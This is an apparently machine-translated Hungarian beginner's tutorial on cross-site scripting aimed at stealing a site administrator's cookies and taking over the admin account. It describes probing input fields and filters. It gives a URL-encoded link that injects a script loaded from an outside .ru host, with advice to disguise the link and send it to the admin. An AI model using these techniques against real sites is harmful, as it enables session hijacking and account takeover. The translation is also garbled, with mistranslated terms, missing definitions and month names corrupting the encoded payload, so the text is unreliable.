Xss - kezdőknek

### Az XSS használata.

Először meg kell tudnunk, mi a süti.
Ha tudod, akkor ugorhatsz.

A cookie-kat a látogató számítógépén tárolják.
Ha a "blabluble" becenév alatt regisztrált a webhelyen, az oldal egy cookie-kkal rendelkező fájlt mentett el a számítógépen, ahol az adatok kódoltak.
És ha Ön a rendszergazda, és rendelkezik hozzáféréssel az oldalon, és én - a felhasználó, aki lopott tőled (a rendszergazda) a cookie-kat, akkor azt nyugodtan menjen a helyszínre, és a helyszínen azt azonosítja, mint „admin” - Azt rendszergazdai jogokkal rendelkezik.

Az ellopott (helyettesítő lopott) szakács cseréje javasoljuk, hogy használja az IE vagy a beépített funkciók CookieEdit használatát az Opera és a Firefox alkalmazásban.


### Mi az XSS támadás?

Az XSS támadások olyan támadások, amelyek nem a webhelyen, hanem a webhelyen használók.
Az XSS egy hiba a szűrőben, alkalmazásban.

Vannak passzív XSS és aktív XSS.

Mi a passzív XSS?

Aktív - ez az XSS, amely nem igényel semmilyen további lépést az áldozatról - elegendő csak az oldal XSS megnyitásával és a Java kód automatikus végrehajtása.
Automatizálásuknak köszönhetően nagyon hasznosak és értékesek.
Például az aktív xss a BB tagekben létezik, mert nem elegendő a szűrés, amikor üzenetet hagy a fórumon # 092, 092. vendég, egy csevegés, amely minden egyes frissítéskor mindig aktív lesz.


### Szóval, pontosan arra fogok menni, hogyan találom meg az XSS-t ezen az oldalon.

Honnan tudja, hogy az XSS egy adott webhelyen megy keresztül?
Szörnyű freakiness típusú

Ezt a szkriptet próbáljuk beilleszteni a különböző területekre. Ha megjelenik egy üzenet, a szkript feldolgozása és végrehajtása megtörtént.

A leggyakoribb XSS (minden olyan helyen megfigyelhető, ahol rossz szűrés történt):


Az egész pont ">.
Gondoljunk arra, hogy mit csinálunk, ha belépünk a mezőbe ">. mi történik?
Bemutatjuk a formát

egy változóhoz tartozik egy érték a mezőhöz. A változó feldolgozásra kerül, "> végrehajtja, lezárja
szkript és letöltés

Ez az XSS a legnépszerűbb a keresőmotorokban:
Megvizsgáljuk a webhely összes mezőjét, és megpróbáljuk beilleszteni


Ha üzenetet kap, megtalálta az XSS-t.


### És hogyan kell meghatározni, van-e szűrő, vagy sem?

Csak bármely mezőben írja be: ''; # 33; - "<########>=
Ezután nyissa meg a html oldalt, és keresse meg a "########" szót
és nézze meg a későbbi ..

Ha a <> így továbbra is ez a sebezhetőség első jele: ez azt jelenti, hogy a szűrőnek lyuk van.
Ha a karakterek megegyeznek a megadott értékekkel - ez a sérülékenység második jele - lehetséges további karakterek a későbbi XSS támadáshoz.
Ezután, ha megnyitotta a HTML-t, akkor nem találta meg <> akkor valószínűleg egy lyuk a szűrőben.
Ha megnyitja a HTML-t, megtalálja azt <> más szimbólumokkal helyettesítve, akkor ez egy bummer - egy szűrő a
normálisan működik.
A szűrés ellenőrzéséhez a következőket is megadhatja: "><>"" ", / # 092 ;? @%

Vegye figyelembe az esetet, ha a szűrő eszik <>

Ebben az esetben van egy lyuk valószínűsége.
Például egy szűrőnek enyhülnie kell

- 2) Ezt még mindig megteheti:


ez a módszer megbízhatóbb.


% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% június 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% március 7% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E

kódolt volt:

- 3) Különösen a titkosítás nem csak a szűrők megtévesztésére, hanem az ADMIN megtévesztésére is szükség van a PASSIVE CSU használatakor.

Mit kér a dokumentum.location.href? )). ez a Java kód, amely kérés nélkül megy a megadott webhelyre, így azt választja, adtuk a linket az adminhoz, és elment a webhelyünkre, ez az, amit csináltunk. Gyorsan dobja


% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% június 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% március 7% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E


és ez már a mi Xss titkosított formában.

Megjegyzés: ez csak akkor működik, ha az Xss a webhely rendszergazdájához tartozik, ahová a linket eldobta.

Kapcsolódó cikkek